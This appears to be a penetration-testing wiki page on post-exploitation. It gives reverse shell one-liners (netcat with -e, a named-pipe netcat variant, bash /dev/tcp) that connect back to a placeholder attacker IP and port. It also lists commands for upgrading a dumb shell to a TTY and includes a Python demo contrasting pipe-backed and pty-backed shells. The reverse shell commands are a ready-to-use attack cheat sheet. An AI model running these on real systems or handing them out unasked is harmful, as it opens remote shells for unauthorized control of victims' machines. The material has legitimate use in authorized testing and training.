Post Exploitation
Jakob Pennington edited this page Feb 4, 2019 · 2 revisions
If we get RCE on a machine by some means, how can we spawn a shell? Start a listener on your own box first (for example `nc -lvnp LOCAL_PORT`), then run one of the following on the target:

```sh
# With nc (needs a netcat build that supports -e, e.g. netcat-traditional or ncat;
# the OpenBSD netcat shipped by Debian/Ubuntu does not)
nc LOCAL_IP LOCAL_PORT -e /bin/sh
# With netcat (same thing, different binary name on some distributions)
netcat LOCAL_IP LOCAL_PORT -e /bin/sh
# nc with -e disabled: a named pipe carries the shell's output back into nc
mknod backpipe p; nc LOCAL_IP LOCAL_PORT 0<backpipe | /bin/bash 1>backpipe
# Without nc: bash's /dev/tcp pseudo-device (bash only, and only if it was
# built with network redirections; stdin/stderr are pointed at the same socket)
/bin/bash -i > /dev/tcp/LOCAL_IP/LOCAL_PORT 0<&1 2>&1
```
Often, exploits will return a dumb shell: you can send commands and receive results, but nothing else (no job control, no tab completion, and programs such as su or ssh that need a terminal fail). We want to own them like we own our own machines, TTY and all. Here is a list of ways to spawn a TTY shell from a dumb shell:

```sh
# Python: allocate a pseudo-terminal and run the shell inside it (try this first)
python -c 'import pty; pty.spawn("/bin/sh")'
# Python without pty: os.system() just forks a child shell, no TTY, but sometimes enough
python -c 'import os; os.system("/bin/bash")'
# Ask sh for an interactive shell directly
/bin/sh -i
# Perl
perl -e 'exec "/bin/sh";'
# From within an interactive perl / ruby / lua interpreter
perl: exec "/bin/sh";
ruby: exec "/bin/sh"
lua: os.execute('/bin/sh')
# From within IRB
exec "/bin/sh"
# From within vi/vim
:!bash
:set shell=/bin/bash
:shell
# From within nmap's interactive mode (nmap --interactive, only in old nmap releases)
!sh
```
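To see why the pty trick is the one that actually upgrades the shell, here is an added example (not from this page): it runs the same probe command through plain pipes, the way an exploit usually hands you a shell, and through a pseudo-terminal pair, the way `pty.spawn("/bin/sh")` does underneath, and also sets the window size on the pty, which is the programmatic form of the `stty rows N cols M` step done after the upgrade. Function names and the probe command are assumptions for the demo.

```python
"""Dumb shell vs. pty shell (added example, not the page's code).
Function names and PROBE are assumptions for this demo."""
import fcntl
import os
import pty
import struct
import subprocess
import termios

# What the shell reports about its own stdin: is it a terminal, and how big?
PROBE = "if [ -t 0 ]; then echo tty; else echo notty; fi; stty size 2>/dev/null"


def shell_over_pipes(probe=PROBE):
    """How an exploit typically hands you a shell: stdio is a pipe or socket,
    so `[ -t 0 ]` fails, stty cannot work, and job control, tab completion
    and su/ssh password prompts all misbehave."""
    r = subprocess.run(["/bin/sh", "-c", probe], stdin=subprocess.DEVNULL,
                       stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
    return r.stdout.splitlines()


def shell_over_pty(probe=PROBE, rows=40, cols=120):
    """What `python -c 'import pty; pty.spawn("/bin/sh")'` does underneath:
    open a master/slave pty pair, hand the slave end to the shell as fds
    0/1/2 and talk to it through the master. TIOCSWINSZ on the slave is the
    equivalent of `stty rows N cols M` in the manual upgrade sequence."""
    master, slave = pty.openpty()
    fcntl.ioctl(slave, termios.TIOCSWINSZ, struct.pack("HHHH", rows, cols, 0, 0))
    proc = subprocess.Popen(["/bin/sh", "-c", probe], stdin=slave, stdout=slave,
                            stderr=slave, start_new_session=True)
    os.close(slave)  # only the child keeps the slave end now
    out = b""
    while True:
        try:
            chunk = os.read(master, 4096)
        except OSError:  # Linux: EIO on the master once the slave side closes
            break
        if not chunk:  # other platforms report plain EOF instead
            break
        out += chunk
    proc.wait()
    os.close(master)
    # the line discipline turns "\n" into "\r\n" on the way out of a tty
    return out.decode().replace("\r\n", "\n").splitlines()


if __name__ == "__main__":
    print("pipes:", shell_over_pipes())
    print("pty:  ", shell_over_pty())
```

After `pty.spawn` in a real session the usual finishing steps are: background the shell with Ctrl-Z, run `stty raw -echo; fg` locally so keystrokes such as Ctrl-C reach the remote side instead of killing your listener, then `reset`, `export TERM=xterm` and `stty rows N cols M` on the target with the values from `stty size` on your own terminal.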